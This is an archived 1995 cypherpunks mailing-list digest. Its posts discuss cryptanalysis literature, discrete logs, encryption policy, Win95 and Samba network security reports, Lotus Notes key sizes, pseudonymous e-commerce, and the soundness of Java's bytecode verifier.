Message-ID: <Pine.D-G.3.91.951113011903.19675C-100000@dg.thepoint.net>


On Sun, 12 Nov 1995, Bill Stewart wrote:

> >> > According to the government's own statistics, 1,800 innocent conversations
> >> > are intercepted each and every time a wiretap or other form of electronic
> >> > surveillance is placed.
> >> This seems curiously inefficient, even for government work.
> 
> There was a discussion on the radio the other day that indicated that
> some drug dealers really _are_ encoding data on their phones - though
> Clipper won't help at all.  The author was talking about hanging out with
> undercover drug agents while doing research on a book about the Mob or drug
> dealers or whatever.  He and the cop were in a bar where a bunch of
> high-level dealers were hanging out; many of them were on their cellphones
> having conversations about "The 'patio furniture' you ordered is here.
> We can get you the 'three tables' on Tuesday; would you like a couple of
> 'chairs' with them also?"  :-)  The dealers weren't bothered by the cops
> being there; their lawyers were over at the next table in case they were needed.

This kind of "coded" talk is frequent in drug cases and is generally easy 
to break -- and to prove what the words meant to the jury.  It can even 
have an unintended probative effect if the defense doesn't put on some 
evidence to support the "patio furniture," or whatever, story.


EBD

> #--
> #				Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
> # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!






From stewarts at ix.netcom.com  Sun Nov 12 22:34:23 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 13 Nov 1995 14:34:23 +0800
Subject: Who needs time vaults anyway?
Message-ID: <199511130613.WAA12515@ix7.ix.netcom.com>


At 01:15 PM 11/11/95 -0800, Simon Spero <ses at tipper.oit.unc.edu> wrote:
>As for real time-release - how about just using conventional encryption, 
>and require it to be brute-forced?  ..... Moore's law .....

Moore's law is really unpredictable - you can't be sure if the rate of
increase will go up or down, which could affect brute-force time by a
factor of 1000 pretty easily, especially if it suddenly becomes convenient
to do something your crypto-algorithm happens to use.

Also, there's a cost problem - a large brute-force project which requires
N years to crack either needs to be ferociously expensive, or else it's
easy for somebody to put a bunch of machines together to crack it faster.
For anything that requires that level of paranoia, Moore's law probably makes
the timing too unpredictable.

It probably makes a lot more sense to just do contractual solutions,
with secret-sharing protocols to minimize the effects of cheating,
bankrupt service providers, and accidents.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From wfgodot at iquest.com  Sun Nov 12 23:45:44 1995
From: wfgodot at iquest.com (Michael Pierson)
Date: Mon, 13 Nov 1995 15:45:44 +0800
Subject: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <nuRpw4B4GnSU088yn@iquest.com>


-----BEGIN PGP SIGNED MESSAGE-----

In article <951110141713_18585763 at mail04.mail.aol.com>, Atp3000 wrote:

>cypherpunks!
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication
>of neural networks in cryptography.



I just greped through "Abstracts in Cryptology" back to 1980 and
"Computer and Communications Security Reviews" up until September
1994 searching for the terms "neural" and "genetic."  The results below
show no evidence of research into the use of neural networks applied
to problems of cryptanalysis (in contrast to genetic algorithms). They
do however indicate their potential utility in such areas as transaction
and traffic analysis, as well as some types of biometric identity
authentication.

I wouldn't be surprised to learn of somebody like FinCEN using
neural-net systems to do pattern analysis on funds transfers and
the like, or the NRO or NSA investing research money into investigating
the usefulness of NNs for image processing or for scanning raw ELINT,
SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

While NNs may not be of direct relevance to cryptanalysis, I suspect
they are, or will be, of great relevance to the task of identifying
what communications should be cryptanalyzed or otherwise scrutinized.
Especially given the high volume of traffic our 'thinkpol' aspire to
be able to listen to.



 `The use of genetic algorithms in cryptanalysis'
 RA  Matthews, Cryptologia  v  17  no 2 (April 93) pp  187  - 201

 The author presents a genetic system for solving simple
 transpositions.  Candidate column orders are assessed for fitness using
 digram frequencies, and the best of them are used to breed a new
 generation of candidates, using column rotations and swaps as mutation
 operators.  The algorithm was useful at finding partial anagrams to aid
 manual solution.


 `Use  of a genetic algorithm in the cryptanalysis of simple substitution
 ciphers'
 R Spillman, M Janssen, B Nelson, M Kepner, Cryptolo gia v 17 no 1
 (Jan 93) pp 31 - 44

 The  authors report using a genetic algorithm to solve monoalphabetic
 substitutions. Randomly chosen keys were evaluated for fitness using
 letter and diagram frequencies, and the fittest candidates were then
 `mated' and subjected to mutation to provide the next generation of
 keys.  The `mating' operation used a selective crossover, in which the
 `best'character of each key was passed on.


 `Tearing up the rules'
 P Sampson, Banking Technology (Nov 93) pp 26 - 30

 Mellon Bank has installed a neural-net-based monitoring system which
 checks card transactions every two hours and looks for abnormal
 activity.  It is claimed to be substantially more effective than
 rule-based systems.


 `Cryptanalysis of knapsack ciphers using genetic algorithms'
 R Spillman, Cryptologia  v XVII no 4 (Oct 93) pp  367 - 377

 The author describes the design and use of a genetic algorithm to
 attack small trap do or knap-sacks and gives performance data to show
 that it functions 50 - 100 times faster than exhaustive search.


 `Neural net works: the way forward?'
 R Martin, Cards International no 99 (9/12/93)  p 9

 Neural networks are in use to detect abnormal card transactions in
 Mellon Bank and the Euro card Netherlands network, and both claimed that
 the system would pay for itself in 1-2 years.


 `Identity Verification using Weighted Personal Characteristics'
 Y Yamazaki, N Komatsu, M Tsuchiya, SCIS 94 paper 5C (in Japanese)

 The authors study whether characteristics of a person's handwriting may
 be used to authenticate that person.  They have used a neural net to
 distinguish persons successfully according to the angles between written
 strokes.


 `Comments on "Cryptanalysis of Knapsack Ciphers Using Genetic
 Algorithms" '
 F Rubin, Cryptologia v XVIII no 2 (April 1994) pp 153 - 154

 The author criticises Spillman's use of genetic algorithms to attack
 knapsack ciphers as ineffective against the kind of knapsacks
 actually proposed for non trivial cryptographic use.


 `Securenet: a network-oriented intelligent intrusion prevention and
 detection system'
 P Sprirakis, S Katsikas, D  Gritzalis, F Allegre, D Androutsopoulos,
 J Darzentas, C Gigante, D Karagiannis, H Putkonen, T Spyrou,  IFIP
 SEC  94  paper  E2

 This paper describes SECURENET, an intrusion detection system being
 built as an EC RACE project to protect integrated broadband
 communications. It uses a number of technologies, such as neural
 networks and secure distributed computation, to detect and classify
 attacks in real time.


 `Using  a  genetic algorithm for optimizing fixed polarity Reed-Muller
 expansions of Boolean functions'
 JF Miller, H Luchian, PV G Bradbeer, PJ Barclay , International Journal
 of Electronics v 76 no 4 (Apr 94) pp 601 - 610.

 The authors report a genetic algorithm which gets good sub-optimum
 Reed-Muller expansions of Boolean functions more quickly than previous
 techniques.



- -Michael


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKUpo9GJlWF+GPx9AQHuiQP8Dkp4o23j06TJCprZh7AYYEBH+IJQZzQW
wtlY+SfOzvcu+zEbQcj6q5G/feM7Ld1cmB/GK3u8qBPnM1OOQxxtvkR7dx//7svx
1P/E926zIOLZ3Q7FZqVLrsUdYJuKob+TXC2B4wMIQTFKXrJ0kNWEXvL4UpH26KkD
FEBXOQWnm8k=
=G5N2
-----END PGP SIGNATURE-----





From weidai at eskimo.com  Sun Nov 12 23:48:34 1995
From: weidai at eskimo.com (Wei Dai)
Date: Mon, 13 Nov 1995 15:48:34 +0800
Subject: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511122243.OAA18565@delhi.CS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>


> I don't know enough about number theory to judge for myself;
> but you can read the (long) paper yourself at
> 
> 	ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z

Thanks for the reference.  The paper gives a running time of exp(c(n 
log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
for discrete log in GF(2^n).  However, this paper was published in 1985. 
There is now an algorithm to calculate discrete logs in GF(p) in
exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
directory), so perhaps GF(2^n) isn't so bad after all. 

Wei Dai





From frissell at panix.com  Mon Nov 13 00:32:44 1995
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 13 Nov 1995 16:32:44 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130204.VAA08135@panix.com>


At 05:37 PM 11/9/95 +0100, someone who understandably prefers to be
Anonymous wrote:

>In only a few decades, crypto's gone from being unheard of to the object
>of an increasingly high-profile PR war over "domestic and international
>terrorists and criminals." The govt's position, however, hasn't changed
>substantially: it doesn't like crypto, and it never will.

It has changed substantially.  Once "born classified" and subject to prison
sentences during WWII, possession and use of crypto is now "legal as church
on a Sunday."  The government's position as late as 1978 (later in the case
of Admiral Bobby) was that open publication of cryptographic research was
good for a free trip to Leavenworth to make little ones out of big ones.
[The fact that they threatened a lot more than they actually prosecuted
doesn't mean that this wasn't their position.]  Things have changed.

>There will never
>be a time when the cops who pull you over or drop by for a visit will say,
>"Ma'am, if you've encrypted that, we respect the fact that you don't want
>anyone to see that--so we'll just be going bow. You have a nice day, now,
>y'hear." And there will never be no cops.

It is easy to imagine such a thing since that is exactly what cops do now
when they encounter people committing acts which used to be felonies.  They
ignore them.  It is quite possible for social arrangements to change in such
a way that the sovereign is no longer held to be able to compel testimony or
the surrender of information.  Certainly, technological changes can make
cases where the cops are aware that you provably possess information rare.

There were no nation states or cops prior to 1600.  It is perfectly possible
that there will be no nation states or cops at some point in the future.
Since policing is a labor intensive occupation and as currently organized
suffers from socialist inefficiency, it may well be disintermediated.  Thus,
cryptographic protocols can (if desired) practically exclude the possibility
of theft (of digital goods).  And if the bulk of the world's economy
consists of digital goods/services (measured by value not volume or weight
obviously <g>) then computers and crypto may be enough.  
  
Nanotechnology may make self defense more efficient than "others" defense
and may make it so easy to defend against state power that it brings on the
collapse of the nation state.  Technological changes bring social changes.  

Full nanotechnology may not even be necessary.  A computer is a nanomachine.
The capabilities of these toys and the networks they run on may be enough in
and of themselves to weaken monopoly institutions of coercion beyond their
tipping points.

DCF

"Jan, you remember what happened 10 years ago today, don't you?  The world
ended.  As we know it don't you mean?"  -- Too much Firesign Theater, not
enough Calculus.






From nobody at REPLAY.COM  Mon Nov 13 00:33:42 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 16:33:42 +0800
Subject: Love Bugs
Message-ID: <199511110054.BAA15772@utopia.hacktic.nl>



The Nov 11 WSJ reports on the scare tactics of security
consultants in the U.S. and by their co-conspiring
counterparts -- spies -- abroad:

Richard Heffernan, an information-security specialist for
30 years, said his clients sometimes return to their
hotel rooms to find their belongings ransacked,
especially in Europe. Some European companies will pay as
much as $10,000 for the laptop of a Fortune 500
executive, he adds.

Watch out for tiny surveillance tools. In 1992, the
Canadian government reportedly warned businessmen that
the French intelligence service was bugging airline seats
and using undercover agents as flight attendants.
Penlight cameras placed above airline seats can make
readable photos of laptop screens.

Spies on planes can overhear conversations from several
seats away. Look for them in business suits with plenty
of luggage, says security consultant Kevin Coffey. "These
guys fit in."

Another consultant estimates that 45% of bugs are on fax
machines, and one group of U.S. executives inadverdently
gave their secrets to the competition by using the fax
machine at Moscow's upscale Metropol Hotel, which is
staffed with former FBI and KGB operatives.

If you are carrying extremely sensitive information, be
especially paranoid.

All this may be too much for some companies, who say they
don't have time to evade possible spies. Rather than take
the trouble, some companies end up postponing business
plans aborad, saying, "Forget it. We'll come back in a
few years."

That's what they said at the office, now listen to the bug
up Gigi's.













From llurch at Networking.Stanford.EDU  Mon Nov 13 00:44:42 1995
From: llurch at Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 16:44:42 +0800
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <4814sh$i3g@Networking.Stanford.EDU>


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000- compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer,.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich





From stevenw at best.com  Mon Nov 13 00:59:37 1995
From: stevenw at best.com (Steven Weller)
Date: Mon, 13 Nov 1995 16:59:37 +0800
Subject: Vannevar Bush, Ultra, and the Other Memex
Message-ID: <v01530502acc885a0a819@[206.86.1.35]>



I borrowed an interesting book from the library a while ago: _Information
and Secrecy. Vannevar Bush, Ultra, and the Other Memex_. If this is old
hat, please ignore.

It covers the history of computing and comparing machines from the early
1900's to about 1950 -- devices employing photocells, relays, gas-filled
tubes, microfilm, punched optical tape, mechanical integrators, etc. There
is a fair amount of crypto relevance as it passes through WWII and the
cracking of cyphers becomes important. It's also a tale of overly-ambitious
projects that rarely worked, beaurocratic bumbling, influence, and
ignorance.

_Information and Secrecy. Vannevar Bush, Ultra, and the Other Memex_.
Colin Burke
The Scarecrow Press Inc.
1994
ISBN 0-8108-2783-2


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw at best.com                   |       -- Time Magazine, 3 July 1995







From bglassle at kaiwan.com  Mon Nov 13 01:13:41 1995
From: bglassle at kaiwan.com (Bob Glassley)
Date: Mon, 13 Nov 1995 17:13:41 +0800
Subject: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <199511110613.WAA18615@kaiwan.kaiwan.com>


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Nov 95 11:15:42 EDT, Charlie Kaufman wrote:

>>1)  What is the key size used by the USA licensed version?
>>
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
>encryption in the exportable version and bigger keys for signatures in all
>versions and for encryption in the USA version. I'm not sure I'm allowed to say
>what the key size will be ahead of the product shipping.

I would assume since they are using a key size >40 bit, it is used for
authentication only, not for data encrytion, that would skirt the ITAR
regs.  If fact according to the docs, there is no data encryption when
connecting to an international version server, regardless of the
client version.

I would assume that a >512 bit key in V4 would allow upwards of 1024
or better.  That should be sufficient for now.

>>2)  Considering RC4 is a proprietary scheme, have there been any
>>concerted efforts to validate it's strength or lack of?  If so, could
>>you give a pointer to any documents I could review.
>>
>There has been considerable discussion of the security of RC4 on this list, and
>some subtle (i.e. worrisome but not disasterous) weaknesses have been
>found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
>to date because it does not encrypt recognizable plaintext with the first few
>bytes of the RC4 stream.

My understanding was that the problems exposed with RC4 that you
mentioned, were with the particular implemenation by Netscape.  I
guess I better go back to the archive and do some reading. :-)

Thanks, for the info.

Bob Glassley


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKQ+hW7xvKhVs/sNAQFgfgP+Jekr28ZImaynnvuEpbZu5imS0Jm8bPwQ
iDw0ZIcF23ngSjb1Z4srt9cSJmL1zV2dEFyxSlXs7CWzBmlw8dSCvz6ArftetRYY
aYe1qwt+bXpGMWplQKUOG/dNk/n52sn1mHNPEJoj/V4G4iAXfDoOokL+zdSJ1Cbk
LuFl+F1M/Zc=
=FHxS
-----END PGP SIGNATURE-----







From tjunker at phoenix.phoenix.net  Mon Nov 13 01:17:12 1995
From: tjunker at phoenix.phoenix.net (Thomas Junker)
Date: Mon, 13 Nov 1995 17:17:12 +0800
Subject: mailing list.
Message-ID: <199511110707.BAA04164@phoenix.net>


On 10 Nov 95 at 13:34, David.Y at freedomnet.com (David Y) wrote:

> Subject:       mailing list.

> Please put me on your mailing list, thanks.

Sure.  Consider it done.

-------------------------
Weak attempt at crypto relevance:

Couldn't trusted date/time-stamping signing robots be used
to establish that offline ecash particles had reached
certain points in their journey?  Might not a bank say
that in the event of a dispute, it will accept the ecash
copy signed earliest by Framis Signer or specified
alternate with claimant's ID inside the disposable
signature wrapper?  I suppose one might just as well 
authenticate the ecash with the bank itself, except that 
the signed copy allows withholding identity unless and 
until there is a dispute.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center





From Atp3000 at aol.com  Mon Nov 13 01:18:39 1995
From: Atp3000 at aol.com (Atp3000 at aol.com)
Date: Mon, 13 Nov 1995 17:18:39 +0800
Subject: coding and nnet's
Message-ID: <951111003859_103654167@mail06.mail.aol.com>


Thank's for your input.  Thus, it does make a lot sence after some
explanation.
Atp3000





From an407769 at anon.penet.fi  Mon Nov 13 01:23:07 1995
From: an407769 at anon.penet.fi (jerry the golden retriever)
Date: Mon, 13 Nov 1995 17:23:07 +0800
Subject: hacker's dream
Message-ID: <9511110629.AA27945@anon.penet.fi>



Windows 95 Is A Hacker's Dream Over The Internet
CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
Internet, could be a dream made in hacker heaven. From seasoned propeller
heads Newsbytes has contacted, it looks like Windows 95 could be more of a
security nightmare than was first thought.

This is especially true where fixed link companies are concerned. An
investigation of the new operating system, when hooked onto the Internet,
leaves computers wide open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to hacking the moment
they access the Internet, claim some analysts.

Worse, they may never know it has been done. Using a simple Unix command, a
hacker can locate the IP (Internet protocol) address of the subscriber logged
into an Internet service provider. Then he needs only one more thing; a
logged-on Internet user using Microsoft's new operating system.

For businesses with leased line Internet links, it can happen at any time,
day or night. Once the IP address has been noted, the hacker simply creates a
file through DOS on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names on the IP, or
Internet provider's port -- the system then refreshes and remaps itself in
preparation to be accessed by the hacker's computer.

Because Windows 95 is designed with a networking capability, it leaves all
computers in the office open to illegal access. Once the hacker has called up
his Map Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that need be done then is
to put in a common drive name, most obviously "C:\." For networked machines,
the default "C$" is common.

This gives access to all files on the subscriber's drive. While Windows 95
allows the user to protect the drive by giving it a password, computer
experts Newsbytes talked to said that device won't necessarily lock out
intruders. Because the operating system has no "audit" trail -- in other
words, it does not log who or how someone is accessing the drive -- a hacker
can spend weeks trying to discover the password. Password search programs,
like Cracker, are readily available and can break through most simple
password sequences.

(Joel McCormick & I.T. Daily/19951109)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse at anon.penet.fi
For information (incl. non-anon reply) write to    help at anon.penet.fi
If you have any problems, address them to          admin at anon.penet.fi





From frantz at netcom.com  Mon Nov 13 01:26:23 1995
From: frantz at netcom.com (Bill Frantz)
Date: Mon, 13 Nov 1995 17:26:23 +0800
Subject: POTP Security
Message-ID: <199511110657.WAA04599@netcom16.netcom.com>


At 19:30 11/10/95 -0500, jgrubs at left.webcasters.com wrote:
>>The first commercially available implementation of our 
>>POTP (Power One Time Pad) encryption algorithm. The package includes 
>>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>>a stand alone file encryption program.
>What level of security does this cute, little puppy provide???

Since they advertize One Time Pad security, the first thing I want to know
is how they distribute their keys.  One Time Pads require a key as long as
the encyphered message.  A one-time-pad system without a convincing story
about key distribution is bullshit.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From anonymous-remailer at shell.portal.com  Mon Nov 13 01:29:45 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 13 Nov 1995 17:29:45 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511110538.VAA18697@jobe.shell.portal.com>


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:

> >>> While all this checking appears excruciatingly detailed, by the time
> >>> the byte code verifier has done its work, the Java interpreter can
> >>> proceed knowing that the code will run securely. Knowing these
> >>> properties makes the Java interpreter much faster, because it doesn't
> >>> have to check anything.
> >
> >Yikes!!  I'll leave this for someone else to address.  This sounds to me
> >like a variation on virus scanning.  I think that there are far more
> >reputable virus experts than I who can comment and expand on *flaws* with
> >that approach.
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
> finite state automata like the java interpreter (made more difficult by the
> fact that it can use the "net" for additional state), it is not even
> remotely feasable.

OK, so by saying that it is not "even remotely feasable", you're saying 
that any comp-sci undergraduate will say that it can't be done?  

That is what "not even remotely feasable" means, doesn't it??  I mean, 
even if Marketing wants this problem solved, that won't be enough?

> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state
> Busy Beaver problem. Deal?

I'm sorry, I only work for T-shirt and mug contests. <grin>  That fifteen 
minutes of fame thingy, just isn't my cup of tea.



> Dietrich Kappe | Red Planet    http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
> 1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From wilcoxb at nagina.cs.colorado.edu  Mon Nov 13 02:20:50 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Mon, 13 Nov 1995 18:20:50 +0800
Subject: technical and social structures in the pseudonymous economy
Message-ID: <199511100450.VAA26914@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

When a person does business pseudonymously (where I consider
pseudonymity to be == anonymity & non-repudiation & two-way
communication (where non-repudation presupposes some sort of
identifier of the actor)) then that person is exempt (for the most
part) from the threat of physical retribution, the force of law,
etc.  Thus in order to be trusted with some valuable information
such as money this person needs to offer up some collateral which
can be debitted in the case that they violate their contract.  Of 
course this raises the question of who holds the collateral, and it is
a big open spot where statists might jump in with their tired old 
rhetoric (as soon as they clue in to what's going on here), but 
I sincerely hope that a highly redundant, interdependent, robust set 
of private "lien, escrow and arbitration" agencies take up the job.


As a simple example, pseudonymous E-bank customers can be required to 
keep positive balances in their accounts, and in the case that they
are caught trying to double-spend or commit other fraud, a fine can be
withdrawn from this account by the bank.  This model can be applied to
any pseudonymous transaction or contract.  It is important to note 
that this technique does *not* eliminate the risk of fraud--  it 
reduces the likelihood that the pseudonymous customer can commit fraud
successfully and it *increases* the likelihood that the bank can do
so.


Of course this is not necessary if we are not giving the pseudonym any
opportunity to cheat us (because we are using all on-line clearing 
etc.) but for most (I think) applications it is necessary to extend to
the pseudonym some amount of trust, in the form of a "loan" or other 
credit, or, in the form of other digital credentials, access to 
information etc. etc.


I consider this to be a very important idea for the development of
the cyberspace economy/community/libertaria and as I mentioned it
is a point where it would be more easy for the statists to attempt 
an inroad into said community.


I envision a situation in which a pseudonym cannot cheat anyone out
of more money than he has already put up as collateral on his
contract.  Thus mere cyber-fraud is never profitable.  Instead, the 
only way to cheat people is to subvert the escrow&arbitration agencies
into ruling unfairly in your favor, allowing you to abscond with your 
collateral and so forth.  This, unfortunately, moves the whole mess of
"law and society" from the elegant cryptographic solutions that we all
love back into the realm of politics, social ideology and so forth, 
but I think we are in a better position to insure fair dealings now
that we have these cryptographic capabilities like non-repudiation
& privacy, and the currency & transaction protocols which follow
from them.


Note that because the escrow&arbitration agencies are likely to be 
large, redundant and interdependent a petty criminal will not have 
much chance of subverting them, but a major one-time heist is 
theoretically effective, as is the organized, large-scale extortion 
which does not heist it all at once but which instead siphons off an
extortion (tax) payment at regular intervals.  (Note strong 
resemblance between this last criminal strategy and the behavior of 
most governments.)


Of course I'm not the first to think about these kinds of things.
 Nick Szabo 
(szabo at netcom.com) in particular has thought a lot about making the 
escrow&arbitration process mathematically deterministic, when he talks
about his "liens" and "smart contracts", but my intuition is that the 
domain of contracts which are amenable to mathematically-controlled
escrow&arbitration is much smaller than the domain of contracts which 
need a trusted intelligence to do the escrow&arbitration.  (Nick also 
discusses the trusted-intelligence issues, such as using n-of-m key 
splitting to distribute the arbitration power.)


In summary:  lien, escrow and arbitration agencies, which are endowed
by the principals with the authority to adjudicate fraud cases, and 
which are entrusted by the principals with the electronic cash, crypto
keys, and so forth to enforce their decisions, will be essential to 
the operation of the pseudonymous economy.  These agencies will
themselves be the targets and/or the perpetrators of theft, however.
Concerned citizens of the world need to start thinking about how to
minimize these risks.  Factors to consider include:  The relatively
low start-up costs of such agencies, the role of governments, mafia, 
or other force-wielding organizations, and "the problem of 
pseudonymity" (can't tell if two pseudonyms are under same True 
Person's control) possibly leading to a single organization 
controlling a large enough share of escrow&arbitration services that 
it can initiate heists or extortion.


I'll be trying to write these ideas of mine into a set of HTML
documents for display on my web pages.  I appreciate all
constructive correspondance.


(P.S.  Of course a pseudonym's reputation may be considered by some
to be valuable enough to use as this "collateral" or "lien".   
It wouldn't be so considered by me.  I'd take cash.)


Regards,

Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKLZp/WZSllhfG25AQH/UQQAuGGRVjQBqpzY3+3ndpTdipFYkEIiRkaF
c+6+FbdsUokCqcbSkTS1Dc/vOt3FRgtScvW9fvbMj0S5oqaLzvrHebLYASgeoihx
AezLI0q8Cf2yKCYC4+e5bq/QPB78ZVsEGnnEDxIedRiLIFz72hCmCi9t+ybCYB9r
yaRjAyNiAxg=
=fGb2
-----END PGP SIGNATURE-----





From remailer at armadillo.com  Mon Nov 13 02:57:31 1995
From: remailer at armadillo.com (Armadillo Remailer)
Date: Mon, 13 Nov 1995 18:57:31 +0800
Subject: Worth of Crypto Consulting
Message-ID: <199511090735.BAA01846@monad.armadillo.com>


Hi all,

 I have been doing some crypto consulting to small businesses for a while,
but it looks like I may be swimming with bigger fish in the near future. I
was wondering what "real" crypto consultants are getting these days. I will
be advising these people on the security of systems others are developing,
and helping them develop their own software, but I have no idea what the
market value of my time is.

Reply to the list, or send a message encrypted to the key below to
alt.anonymous.messages with the subject "anonymous consultant". 

        Many thanks,
           Anonymous Consultant

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCSAzCg84IAAAEEAOQ8cz/jqonUOWmS9lMWMh1CnFqwV8mYTbBS2zla5UQ61Tdn
272AUeKSil0PkUKqRcFW4xFbOJsMACryo15/iciuRQkwQ27ypDL0gcyjEIeYt6Aa
h4j8b+XWWtjkRg5LApn6vms+ocI+MkFn6phJkOTb+xC18W572HFMiqhPvugNAC0Q
AAAAAAG0LUFub255bW91cyBDb25zdWx0YW50IDxhbHQuYW5vbnltb3VzLm1lc3Nh
Z2VzPg==
=pIE2
-----END PGP PUBLIC KEY BLOCK-----






From ses at tipper.oit.unc.edu  Mon Nov 13 02:57:34 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Mon, 13 Nov 1995 18:57:34 +0800
Subject: Java's verifier (was Re: Java insecurity - long - argumentative - you are warned.)
In-Reply-To: <v01510103acc4ce7ca31a@[206.1.161.4]>
Message-ID: <Pine.SOL.3.91.951108225902.10149A-100000@chivalry>


On Tue, 7 Nov 1995, Dietrich J. Kappe wrote:
> 
> This "checking," as any comp-sci undergrad will tell you, amounts to solving
> the halting problem for the java interpreter. While this is possible for a
[...]
> If you can write a checker that works in a reasonable amount of time, I'll
> write a turing machine simulator that'll do something nasty if the input
> machine halts. Then we'll split the fame and fortune for solving the 5 state

Yeah, but when you graduate, they let you in to the real secret- if a 
problem is NPC or Undecideable, either use some wild guesswork (oops, 
heuristic), or try solving enough of the problem to be usable. 

The java verifier not only terminates, but runs in time linear to the 
size of the program to be verified. This is because the verifier doesn't 
really calculate whether a program is safe or not; it determines whether 
it can prove that the program is safe or not. It's possible to generate 
sequences of bytecodes that do not perform unsafe accesses, yet which are 
still rejected by the verifier because they violate it's requirements.

The verifier can be considered to be an abstract interpretation over the 
depth and type-state of the operand stack. If the state is known before 
an instruction, it is always known after that instruction, and if there 
is more than one way to arrive at an instruction, each control path must 
arrive at that instruction with the same typestate.

Examples (not real JavaVM, but similar)

	load-int  <int>	== push an int onto the stack.
			before: ...
			after : ...,int

	load-float <flt>== push a float onto the tack
			before: ...
			after: ...,float
		
	add-int		== pop two ints off the stack, push sum onto stack
			before: ...,int,int
			after:  ...,int

	blt <val><add>  == pop an int off the stack, compare to val, and 
			      jump to address add if int is less than val

